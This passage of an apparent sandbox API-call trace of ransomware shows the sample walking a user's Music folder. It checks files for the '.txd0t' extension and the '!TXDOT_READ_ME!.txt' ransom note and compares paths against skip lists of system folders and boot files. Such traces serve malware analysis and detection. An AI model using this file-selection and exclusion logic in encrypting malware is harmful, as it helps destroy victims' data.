ftLastAccessTime.dwLowDateTime=0x51c5385c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c5385c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec26f0 [0090.205] StrCmpW (psz1=".", psz2=".") returned 0 [0090.205] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e8fd740, ftCreationTime.dwHighDateTime=0x1d5f0f0, ftLastAccessTime.dwLowDateTime=0x51c5385c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c5385c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.205] StrCmpW (psz1="..", psz2=".") returned 1 [0090.205] StrCmpW (psz1="..", psz2="..") returned 0 [0090.205] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51c0731b, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51c0731b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c2d4bd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x741, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.205] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.205] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.205] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0090.205] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0090.205] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\!TXDOT_READ_ME!.txt" [0090.206] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.206] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.206] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.206] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.206] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.206] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.206] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.206] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.206] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.206] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.206] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.206] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.206] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.206] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.206] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.206] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.206] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53f37ef0, ftCreationTime.dwHighDateTime=0x1d5e7f8, ftLastAccessTime.dwLowDateTime=0x51c0731b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName="OAdJkPb-", cAlternateFileName="")) returned 1 [0090.206] StrCmpW (psz1="OAdJkPb-", psz2=".") returned 1 [0090.206] StrCmpW (psz1="OAdJkPb-", psz2="..") returned 1 [0090.206] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0090.206] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0090.206] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="OAdJkPb-", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0090.206] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\windows\\system32\\") returned 0x0 [0090.206] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.206] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\windows\\system\\") returned 0x0 [0090.206] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.206] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.206] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\appdata\\local\\") returned 0x0 [0090.206] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.206] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.206] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.206] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\boot\\") returned 0x0 [0090.206] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\perflogs\\") returned 0x0 [0090.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\programdata\\") returned 0x0 [0090.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\drivers\\") returned 0x0 [0090.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\wsus\\") returned 0x0 [0090.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="crypt_detect") returned 0x0 [0090.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="cryptolocker") returned 0x0 [0090.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="ransomware") returned 0x0 [0090.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="C:\\WINDOWS") returned 0x0 [0090.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", lpSrch="C:\\Program Files") returned 0x0 [0090.207] GetProcessHeap () returned 0xe30000 [0090.207] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d6) returned 0xecc4d0 [0090.207] StrCpyNW (in: psz1=0xecc4d0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0090.207] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\*", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\*") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\*" [0090.207] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\*", lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53f37ef0, ftCreationTime.dwHighDateTime=0x1d5e7f8, ftLastAccessTime.dwLowDateTime=0x51c0731b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec21f0 [0090.207] StrCmpW (psz1=".", psz2=".") returned 0 [0090.207] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53f37ef0, ftCreationTime.dwHighDateTime=0x1d5e7f8, ftLastAccessTime.dwLowDateTime=0x51c0731b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.207] StrCmpW (psz1="..", psz2=".") returned 1 [0090.207] StrCmpW (psz1="..", psz2="..") returned 0 [0090.207] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51b94cac, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51b94cac, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51bbadbb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.207] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.207] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.207] StrCpyNW (in: psz1=0xecc4d0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0090.207] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\" [0090.207] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\!TXDOT_READ_ME!.txt" [0090.207] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.207] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.207] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.208] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.208] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.208] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.208] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.208] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.208] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.208] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.208] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.208] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.208] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.208] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.208] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.208] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.208] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee4d8020, ftCreationTime.dwHighDateTime=0x1d5e764, ftLastAccessTime.dwLowDateTime=0xe32ee490, ftLastAccessTime.dwHighDateTime=0x1d5eb06, ftLastWriteTime.dwLowDateTime=0x51b94cac, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x2b3c, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="KXtDlQHWMbiCZ2hHs6x.m4a.txd0t", cAlternateFileName="KXTDLQ~1.TXD")) returned 1 [0090.208] StrCmpW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a.txd0t", psz2=".") returned 1 [0090.208] StrCmpW (psz1="KXtDlQHWMbiCZ2hHs6x.m4a.txd0t", psz2="..") returned 1 [0090.208] StrCpyNW (in: psz1=0xecc4d0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0090.208] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\" [0090.208] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\", psz2="KXtDlQHWMbiCZ2hHs6x.m4a.txd0t", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\KXtDlQHWMbiCZ2hHs6x.m4a.txd0t" [0090.208] PathFindExtensionW (pszPath="KXtDlQHWMbiCZ2hHs6x.m4a.txd0t") returned=".txd0t" [0090.208] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.208] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61010020, ftCreationTime.dwHighDateTime=0x1d5e6f1, ftLastAccessTime.dwLowDateTime=0x203b5a50, ftLastAccessTime.dwHighDateTime=0x1d5ef15, ftLastWriteTime.dwLowDateTime=0x51be116e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7fd1, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="pEnlGp0QjdthKZA-Yo5o.mp3.txd0t", cAlternateFileName="PENLGP~1.TXD")) returned 1 [0090.208] StrCmpW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3.txd0t", psz2=".") returned 1 [0090.208] StrCmpW (psz1="pEnlGp0QjdthKZA-Yo5o.mp3.txd0t", psz2="..") returned 1 [0090.208] StrCpyNW (in: psz1=0xecc4d0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0090.208] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\" [0090.208] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\", psz2="pEnlGp0QjdthKZA-Yo5o.mp3.txd0t", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\pEnlGp0QjdthKZA-Yo5o.mp3.txd0t" [0090.208] PathFindExtensionW (pszPath="pEnlGp0QjdthKZA-Yo5o.mp3.txd0t") returned=".txd0t" [0090.208] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.208] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f2e37b0, ftCreationTime.dwHighDateTime=0x1d5ec02, ftLastAccessTime.dwLowDateTime=0xacd5dae0, ftLastAccessTime.dwHighDateTime=0x1d5e3c0, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x2cb0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="ZwNcr2UV.mp3.txd0t", cAlternateFileName="ZWNCR2~1.TXD")) returned 1 [0090.208] StrCmpW (psz1="ZwNcr2UV.mp3.txd0t", psz2=".") returned 1 [0090.208] StrCmpW (psz1="ZwNcr2UV.mp3.txd0t", psz2="..") returned 1 [0090.208] StrCpyNW (in: psz1=0xecc4d0, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-" [0090.208] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\" [0090.208] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\", psz2="ZwNcr2UV.mp3.txd0t", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\OAdJkPb-\\ZwNcr2UV.mp3.txd0t" [0090.209] PathFindExtensionW (pszPath="ZwNcr2UV.mp3.txd0t") returned=".txd0t" [0090.209] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.209] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f2e37b0, ftCreationTime.dwHighDateTime=0x1d5ec02, ftLastAccessTime.dwLowDateTime=0xacd5dae0, ftLastAccessTime.dwHighDateTime=0x1d5e3c0, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x2cb0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="ZwNcr2UV.mp3.txd0t", cAlternateFileName="ZWNCR2~1.TXD")) returned 0 [0090.209] FindClose (in: hFindFile=0xec21f0 | out: hFindFile=0xec21f0) returned 1 [0090.209] GetProcessHeap () returned 0xe30000 [0090.209] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecc4d0 | out: hHeap=0xe30000) returned 1 [0090.209] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1082d280, ftCreationTime.dwHighDateTime=0x1d5e2d8, ftLastAccessTime.dwLowDateTime=0xc5bdf750, ftLastAccessTime.dwHighDateTime=0x1d5e2ca, ftLastWriteTime.dwLowDateTime=0x51c0731b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1089c, dwReserved0=0x741, dwReserved1=0x0, cFileName="Ph7y_8.m4a.txd0t", cAlternateFileName="PH7Y_8~1.TXD")) returned 1 [0090.209] StrCmpW (psz1="Ph7y_8.m4a.txd0t", psz2=".") returned 1 [0090.209] StrCmpW (psz1="Ph7y_8.m4a.txd0t", psz2="..") returned 1 [0090.209] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0090.209] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0090.209] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="Ph7y_8.m4a.txd0t", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Ph7y_8.m4a.txd0t" [0090.209] PathFindExtensionW (pszPath="Ph7y_8.m4a.txd0t") returned=".txd0t" [0090.209] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.209] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb523a730, ftCreationTime.dwHighDateTime=0x1d5e9b6, ftLastAccessTime.dwLowDateTime=0xe6d8b110, ftLastAccessTime.dwHighDateTime=0x1d5e1a2, ftLastWriteTime.dwLowDateTime=0x51c2d4bd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7468, dwReserved0=0x741, dwReserved1=0x0, cFileName="Pq-yXja0.m4a.txd0t", cAlternateFileName="PQ-YXJ~1.TXD")) returned 1 [0090.209] StrCmpW (psz1="Pq-yXja0.m4a.txd0t", psz2=".") returned 1 [0090.209] StrCmpW (psz1="Pq-yXja0.m4a.txd0t", psz2="..") returned 1 [0090.209] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0090.209] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0090.209] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="Pq-yXja0.m4a.txd0t", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\Pq-yXja0.m4a.txd0t" [0090.209] PathFindExtensionW (pszPath="Pq-yXja0.m4a.txd0t") returned=".txd0t" [0090.209] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.209] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f9103d0, ftCreationTime.dwHighDateTime=0x1d5ed7e, ftLastAccessTime.dwLowDateTime=0x51d2c0b0, ftLastAccessTime.dwHighDateTime=0x1d5e98b, ftLastWriteTime.dwLowDateTime=0x51c5385c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13397, dwReserved0=0x741, dwReserved1=0x0, cFileName="zaYdv7kbUlcUxSz3KeA-.wav.txd0t", cAlternateFileName="ZAYDV7~1.TXD")) returned 1 [0090.209] StrCmpW (psz1="zaYdv7kbUlcUxSz3KeA-.wav.txd0t", psz2=".") returned 1 [0090.209] StrCmpW (psz1="zaYdv7kbUlcUxSz3KeA-.wav.txd0t", psz2="..") returned 1 [0090.209] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc" [0090.209] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc", psz2="\\", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\" [0090.209] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\", psz2="zaYdv7kbUlcUxSz3KeA-.wav.txd0t", cchMax=1092 | out: psz1="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\ESQxTLKmutc\\zaYdv7kbUlcUxSz3KeA-.wav.txd0t" [0090.209] PathFindExtensionW (pszPath="zaYdv7kbUlcUxSz3KeA-.wav.txd0t") returned=".txd0t" [0090.209] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.209] FindNextFileW (in: hFindFile=0xec26f0, 